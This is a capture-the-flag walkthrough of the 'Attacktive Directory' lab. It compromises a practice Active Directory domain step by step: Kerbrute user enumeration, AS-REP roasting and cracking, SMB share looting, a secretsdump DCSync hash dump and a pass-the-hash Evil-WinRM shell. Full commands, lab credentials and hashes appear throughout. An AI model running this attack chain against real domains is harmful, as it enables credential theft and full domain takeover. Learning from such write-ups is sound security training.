Skip to main content

Atackive directory THM{}

Setup

Installing Impacket

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

Installing Bloodhound and Neo4j

apt install bloodhound neo4j

Process

  1. Enumerate with Nmap

We obtain this useful information. The full AD domain is spookysec.local.

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos

3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-04T09:53:32+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-03-04T09:53:25+00:00
  1. Enumerate 139/445 with enum4linux
enum4linux -a <IP>
  1. Enumerating Users via Kerberos Kerberos is a key authentication service within Active Directory and with the port 88 opened, we can use a tool called Kerbrute to bruteforce discovery of users, password and even password spray. To install kerbrute, visit: https://bhichher.medium.com/user-enumeration-using-kerbrute-tool-5154a252f6a4

To enumerate usernames, it is compulsory to indicate de domain. As we know, if we just use spookysec.local kali wont know the IP. So, we have to add it to the /etc/hosts file.

./kerbrute userenum --dc spookysec.local -d spookysec.local /home/kali/THM/wind/userlist.txt -t 100


    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 03/05/22 - Ronnie Flathers @ropnop

2022/03/05 03:47:14 >  Using KDC(s):
2022/03/05 03:47:14 >   spookysec.local:88

2022/03/05 03:47:14 >  [+] VALID USERNAME:       james@spookysec.local
2022/03/05 03:47:14 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2022/03/05 03:47:15 >  [+] VALID USERNAME:       James@spookysec.local
2022/03/05 03:47:15 >  [+] VALID USERNAME:       robin@spookysec.local
2022/03/05 03:47:16 >  [+] VALID USERNAME:       darkstar@spookysec.local
2022/03/05 03:47:16 >  [+] VALID USERNAME:       administrator@spookysec.local
2022/03/05 03:47:18 >  [+] VALID USERNAME:       backup@spookysec.local
2022/03/05 03:47:18 >  [+] VALID USERNAME:       paradox@spookysec.local
2022/03/05 03:47:22 >  [+] VALID USERNAME:       JAMES@spookysec.local
2022/03/05 03:47:23 >  [+] VALID USERNAME:       Robin@spookysec.local
2022/03/05 03:47:30 >  [+] VALID USERNAME:       Administrator@spookysec.local
2022/03/05 03:47:44 >  [+] VALID USERNAME:       Darkstar@spookysec.local
2022/03/05 03:47:49 >  [+] VALID USERNAME:       Paradox@spookysec.local
2022/03/05 03:48:05 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
2022/03/05 03:48:10 >  [+] VALID USERNAME:       ori@spookysec.local
2022/03/05 03:48:19 >  [+] VALID USERNAME:       ROBIN@spookysec.local
  1. ASREPRoasting Attack First, we will use GetNPUsers.py from Impacket to retrieve kerberos ticket and try to decrypt it 
sudo find / -type f -name 'GetNPUsers.py'

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:57b172a9aa785d8252a3509e7208d175$df011d8e21e10b0781783c9f625bc1b61cfed91037e4db5912f5eeba300401154a276108d3c12c364b1ed42e7c4243dd1607ed2a2a5ac5b47d1c586511d7a3a71b0e62aec0719b6fe4a12a7568f1aa1d491e07a8a46c40e65159565d655ff33c33a0d305d8a177272fb9d37811bd39942a764b4247f990878d62a2d85e82f08bf84332c531c4be2c90ab970bba9d0edbaf1ffbdb347d82b675c3ee2a55b2ec65f9e39b06acf502364aa3fe45751b8cefb6cbb0ad583e97bef5d4fa48ed61af5f468b1b8dbc277329e1fc2e53f9d84f4696b7907fe77a31d40dc4025e95a7346988ab487efbf711ac967bda862e9fecd0d922

After that, we identify using the hashcat list, that the mode is 18200 in order to crack it.

john svc-adminhash --wordlist=/usr/share/wordlists/rockyou.txt

# management2005   ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)
  1. Now that we have user's account credentials, we can attempt to enumerate any shares. For that, we will be using smbclient
smbclient -U=svc-admin%management2005 -L //10.10.251.19  

Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

Now we test the access to the different shares:

smbclient -U=svc-admin%management2005 //10.10.251.19/backup

smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

That one in particular, show as a txt. After downloading it and decoding, this info is obtained:

backup@spookysec.local:backup2517860
  1. Elevating Privileges within the Domain Now we use the credentials and connect through RDP
xfreerdp /v:10.10.251.19 /u:backup /p:backup2517860

This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. How do we know that?

1. Open Active Directory Users and Computers.
2. From the View menu, select Advanced Features.
3. Right-click the domain object and select Properties.
4. Click the Security tab.
5. Select the backup username and go to "Replicant Directory Changes All"

Due to that, we can use another tool within Impacket called "secretsdump.py" that will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

sudo find / -type f -name 'secretsdump.py'

# usr/share/doc/python3-impacket/examples/secretsdump.py

Now we use secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py backup:backup2517860@spookysec.local

# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

One of the hashes we obtained is from the administration account, so now we can use a pass the hash method to authenticate as the user without the password.

  1. Pass the hash Now we are gonna use Evil-WinRM. To install it:
Method 2. Git clone and install dependencies on your system manually

    Step 1. Install dependencies manually: sudo gem install winrm winrm-fs stringio logger fileutils
    Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
    Step 3. Ready. Just launch it!

cd evil-winrm && ruby evil-winrm.rb -i 10.10.169.166 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc


# Evil-WinRM shell v3.3

# Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

# Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

# Info: Establishing connection to remote endpoint

# *Evil-WinRM* PS C:\Users\Administrator\Documents>

And we obtain the flags from the desktop folders: svc-admin trhough the cracked password (obtained with kerbrute and GetNPUsers.py), backup through the smb obtained txt file credentials and Administrator through Pass The Hass.